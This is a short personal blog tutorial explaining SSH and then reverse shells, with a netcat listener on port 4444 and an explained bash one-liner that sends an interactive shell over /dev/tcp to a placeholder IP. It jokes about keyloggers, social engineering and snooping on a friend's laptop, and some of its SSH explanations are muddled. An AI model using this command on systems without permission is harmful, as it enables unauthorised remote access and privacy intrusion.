Reverse Shell: Hands-on Introduction

vishal manikantavishal manikanta
5 min read

Most of us are already familiar with SSH—but if not, no worries; I’ll start with a quick intro so we’re all on the same page. After that, we’ll dive into what a reverse shell is, how it functions, why it’s such an intriguing concept, and explore potential ways to improve it. Let’s jump right in!

What’s SSH?

Imaging this situation, you and your friend have their own laptop and you want to connect to his laptop wirelessly to access his system, maybe get his files, load something into his system or even maybe install a keylogger into his system and then record every key he types and remotely transmit to your system so that you can snitch on him. To achieve all of this, you somehow need to get/make a connection to his system( preferably wireless) and here comes the role of SSH, in simple terms it helps you *connect to any system that is connected to the internet or has a Public IP. with this introduction, SSH stands for Secure Shell.

Flow of SSH is as follows:

  1. The 2 systems that should be connected should have an IP and the other system’s IP should be known by you.

  2. The user password of the other system should be known

  3. with this information, you can initiate the ssh connection from your system which looks something like
    ssh <username>@<IP> and if everything goes right, it promps to enter the password and it logs into the system.

Let’s understand SSH from the security point. looking at the “meta-steps” or the information that is required before the connection establishment like knowing the public IP, username, password, port opening of the other system, we can understand that it is pretty secure and from SSH perspective that standard should be maintained as ~20 million users use SSH everyday and any kind of vulnerabilities will break the systems. One more point i would like to mention before introduction reverse-shell is that, during any SSH, the connection initiation should be started from the user system and it should be accepted on the other side of system(it is much complex that just saying YES of course).

Reverse Shell

With the above information processed, let me introduce what reverse shell is and how it is different from normal shell and let me also tell you how if done properly, you can “hack” in to the other system.

Reverse shell breaks the fundamental rule of SSH by establishing the connection from the target system to host system instead of establishing connection from host system to target system. This might look like minor difference from SSH but just think about it, now you don’t have to Know the credentials of the target system to initiate the connection, you just have to make them start the connection(knowingly or unknowingly😉) there are ways to do that and it is called Social Engineering and is a different topic to discuss.

Advantages of Reverse shell

As mentioned above, making that connection from the target system makes our system the target and now it is easy to make the connection as we know everything about our system.

Flow of Reverse shell:

  1. Make some port on our device start listening(Ex. make port 4444 listen to any traffic coming from the internet or even from a simple TCP connection)

  2. on the target device, run the script which makes their system send a connection request to our system(this will be simple as the target system is our system right now and we know the parameters to pass)

  3. Hopefully if everything goes right, we will have a Standard input entry box on our system.

Reverse shell: Hands On

Enabling port listening on our device

As mentioned in the first step, let us open a port on our device

Here i used Netcat on an EC2 instance to implement the reverse shell connection. Install netcat(it should work if nmap is installed)

Now, coming to the target device, we just need to run a single command on the target device to establish the connection.

Explanation:

  • /bin/bash -i: This starts an interactive bash shell.

  • >& /dev/tcp/<Public-IP>/<PORT>: This redirects both stdout and stderr to the specified IP and port.

  • 0>&1: This redirects stdin to the same place as stdout.

  • Of course the IPs are changed and will be different in every case.

and once the command is executed, we should something like below on the other system and just to verify, i executed whoami it returned my local system’s username.

From this, i was able to create a reverse connection to my system, but remember that this is not a shell session, instead it is just outputting the stdout and stderr to the foreign system and this is the biggest bottleneck of this process.

Conclusion:

In summary, SSH (Secure Shell) is a powerful protocol that allows secure remote access to systems over a network. It requires knowledge of the target system's public IP, username, and password, making it a secure method for remote administration. The security measures in place, such as encryption and authentication, ensure that the connection is protected from unauthorized access.

On the other hand, a reverse shell flips the traditional SSH connection model by initiating the connection from the target system back to the attacker's system. This method can bypass some security measures, as it does not require the attacker to know the target's credentials. Instead, the attacker must trick the target system into executing a command that establishes the connection, often through social engineering techniques. There is a lot of room for improvement for this technique and i felt that something can be build on a simple TCP session as well and the paths are endless

Key Points:

  • Security of SSH: SSH is widely used and considered secure due to its encryption and authentication mechanisms. It is essential for protecting sensitive data and maintaining system integrity.

  • Reverse Shell Mechanics: A reverse shell allows an attacker to gain access to a target system without needing credentials, making it a potent tool for exploitation.

  • Listening Port: Setting up a listening port on the attacker's machine is crucial for receiving the connection from the target system.

  • Limitations: While a reverse shell can provide access, it often lacks the full functionality of a standard shell session, which can limit the attacker's capabilities.

I hope, you don’t go through your friend’s device and get their personal information, but hey they might be already doing this on your system, who knows😉.

1
Subscribe to my newsletter

Read articles from vishal manikanta directly inside your inbox. Subscribe to the newsletter, and don't miss out.

#LearninPublicsshshellterminalhackingSecurity

Written by

vishal manikanta
vishal manikanta

As a technologist passionate about building robust systems, I am deeply engaged with DevOps, cloud-native technologies, and automation. My technical journey is centered on a deep dive into Golang, where I explore everything from concurrency to building system tools. I am also proficient in Python, applying it to machine learning and data science projects. From architecting Kubernetes clusters to exploring cybersecurity principles and the fundamentals of self-improvement, I am a lifelong learner constantly seeking new challenges. This blog is where I document my projects and share insights from the ever-evolving world of technology.